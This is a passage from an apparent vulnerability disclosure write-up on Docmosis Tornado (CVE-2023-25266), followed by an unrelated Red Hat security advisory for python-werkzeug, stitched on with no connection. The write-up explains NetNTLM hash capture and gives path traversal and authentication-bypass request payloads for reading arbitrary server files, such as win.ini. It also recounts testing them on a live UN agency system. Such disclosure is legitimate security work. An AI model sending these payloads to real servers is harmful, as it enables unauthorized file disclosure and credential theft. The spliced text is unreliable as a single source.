Since the targeted server uses NTLM authentication to login to the attacker’s fake SMB server, this could of course be used to capture the **NetNTLM hash**. This hash could be cracked offline, so finally an attacker would have had valid Windows credentials to access the server via other channels.

**Multiple Path Traversals - File Read**

In general, no proper validation of file system operations with respect to traversal attacks can be found. This allows various attack vectors leading to file disclosure out of the context directories specified within the Tornado application.

**Restricted File Read**

First, we show a file read primitive with a few restrictions for the attacker. The **“Source Templates From”** directory is set to C:\Users\user\Desktop\templates in our lab environment.

Using the function _“Creating dummy data based on template”_ in the web UI fills the _Data_ text field automatically so afterwards we can click the _Test_ button to create e.g. a PDF file. Next to our templates directory, mentioned above, we put a file with fake secret data C:\Users\user\Desktop\secretfolder\secret.txt. Now the request is intercepted and a path traversal payload injected into the template reference path.

Indeed, the generated document contains the content of the secret file: a file located at a completely different folder than C:\Users\user\Desktop\templates.

This seems at least be restricted to certain file types but nevertheless is a juicy vulnerability.

**Full File Read**

The most dangerous path traversal vulnerability originates from the service call to /fetch?filename=[SOME_NAME].pdf. This is called after we generated the PDF file above to automatically download the file content from the server.

The corresponding implementation can be found in com.docmosis.webserver.servlet.FetchTmp.doGet(HttpServletRequest, HttpServletResponse). The filename request parameter is used within a String concatenation to retrieve the file.

    filename = request.getParameter("filename");
    filename = System.getProperty("java.io.tmpdir") + "/" + filename;
    

This allows an attacker to again introduce relative path segments, giving access to arbitrary files on the server file system. Here, we show reading the file C:\Windows\win.ini.

**Authentication Bypass**

Even though, the default installation does not require an _Admin password_ being set, the web UI indeed provides a configuration field. To test this, we set a password, clicked the logout button and indeed are redirected to the login page.

Also our full file read vulnerability now cannot be exploited anymore from an unauthenticated content (_still exploitable as authenticated user, though_).

Looking at the web descriptor file web.xml reveals that an authentication filter is set in place for all URI paths.

    <filter-mapping>
    	<filter-name>AuthenticatedCheckFilter</filter-name>
    	<url-pattern>/*</url-pattern>
    </filter-mapping> 
    

Every request has to go through the Java Servlet filter com.docmosis.webserver.servlet.AuthenticatedCheckServlet.doFilter(ServletRequest, ServletResponse, FilterChain). Surprisingly, the authentication check can be bypassed to reach the final chain.doFilter(request, response) call. Responsible for this is the following code path:

    if (!authenticated) // [1]
    {
      if (!isRestCall) { // [2]
    
    
    
        
        WebServerPreferences prefs = WebServerPreferencesStore.getPrefs();
        boolean authenticationRequired = !StringUtilities.isEmpty(prefs.getAdminPassword());
        
        if (authenticationRequired) { // [3]
          
          if (isGWTRPCCall) {
            
            ((HttpServletResponse)response).sendError(401); return;
          } 
          if (!this.authPostUrl.equals(req.getRequestURI())) {
            
            RequestDispatcher rd = req.getRequestDispatcher("/authenticate.jsp");
            rd.forward(request, response);
    
            
            return;
          } 
        }
    } 
    

At \[1\], it is properly checked if the user is already authenticated. If not, the if branch is entered. If this request is not part of a REST call \[2\] and an Admin password is set \[3\], then access is denied. The problem now relies in the check if isRestCall is true/false.

    boolean isRestCall = req.getRequestURI().startsWith("/api/")
    

Our path traversal attack e.g. /fetch?filename=../../../../../Windows/win.ini indeed does not start with /api but at this point of HTTP request processing, a simple bypass is possible due to using the startsWith String method. Using an URI path with relative path segments like /api/../fetch?filename=../../../../../Windows/win.ini bypasses the authentication check and triggers the file read primitive again.

**Internet Exposure Check**

These findings were shared with the vendor and they released **version 2.9.5** to address these issues (I did not validate the patches, though). Checking the exposure rate of this software on the public Internet, one of the systems found was **\[REDACTED\].upu.int**. Even though, this instance was not using the latest version, the same vulnerabilities still worked fine.

As it turned out, this system belongs to the **Universal Postal Union (UPU)**, a specialized agency of the United Nations (UN). Additionally, this system seemed to be part of the official UPU network, i.e. no cloud-hosted instance but rather an entry point to the network of UPU.

The system exposed a web UI of Docmosis Tornado with default configurations, i.e. no authentication needed at all. Even if authentication would have been needed, we already found an **Authentication Bypass**.

To prove the system to be vulnerable, we read the content of C:\Windows\win.ini and provided the report as quickly as possible.

**Acknowledgements**

Many thanks to Carlos from UNICC to forward my requests to UPU quickly. Also the Docmosis team communicated fast and professionally.

P.S.: I’m pretty sure there’re more vulnerabilities in this product. Go, practice and responsibly disclose issues to the Docmosis team. Maybe you’ll find a deserialization vulnerability somewhere _\*hint\*_.

CVE-2023-25266: Using 0days to Protect the United Nations

An update for python-werkzeug is now available for Red Hat OpenStack
Platform 17.0 (Wallaby).
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2023-25577: A flaw was found in python-werkzeug. Werkzeug is multipart form data parser, that will parse an unlimited number of parts, including file parts. These parts can be a small amount of bytes, but each requires CPU time to parse, and may use more memory as Python data. If a request can be made to an endpoint that accesses request.data, request.form, request.files, or request.get_data(parse_form_data=False), it can cause unexpectedly high resource usage, allowing an attacker to cause a denial of service by sending crafted multipart data to an endpoint that will parse it. The amount of CPU time required can block worker processes from handling legitimate requests, and if many concurrent requests are sent continuously, this can exhaust or kill all available workers.


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   OpenShift Dev Spaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

Issued:

2023-02-28

Updated:

2023-02-28

**RHSA-2023:1018 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: Red Hat OpenStack Platform 17.0 (python-werkzeug) security update

**Type/Severity**

Security Advisory: Important

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for python-werkzeug is now available for Red Hat OpenStack  
Platform 17.0 (Wallaby).  

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

**Description**

Werkzeug ======== Werkzeug started as simple collection of various  
utilities for WSGI applications and has become one of the most advanced  
WSGI utility modules. It includes a powerful debugger, full featured  
request and response objects, HTTP utilities to handle entity tags, cache  
control headers, HTTP dates, cookie handling, file uploads, a powerful URL  
routing system and a bunch of community contributed addon modules. Werkzeug  
is unicode aware and doesn't enforce a specific template engine, database  
adapter or anything else. It doesn't even enforce a specific way of  
handling requests and leaves all that up to the developer. It's most useful  
for end user applications which should work on as many server environments  
as possible (such as blogs, wikis, bulletin boards, etc.).  

Security Fix(es):  

*   high resource usage when parsing multipart form data with many fields

(CVE-2023-25577)  

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page listed in the References section.

**Affected Products**

*   Red Hat OpenStack 17 x86\_64

**Fixes**

*   BZ - 2170242 - CVE-2023-25577 python-werkzeug: high resource usage when parsing multipart form data with many fields

**Red Hat OpenStack 17**

SRPM

python-werkzeug-2.0.1-5.el9ost.src.rpm

SHA-256: 4141d4f2bab3d44ed059e5a4cf9ef90834c9d63b78a26ad7c8857da2fb4b5bed

x86\_64

python3-werkzeug-2.0.1-5.el9ost.noarch.rpm

SHA-256: 99f61653b13e5d4b2c80657504738cd2b1ad4c66eed109a30172ea536127f2ce

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

Tag

#java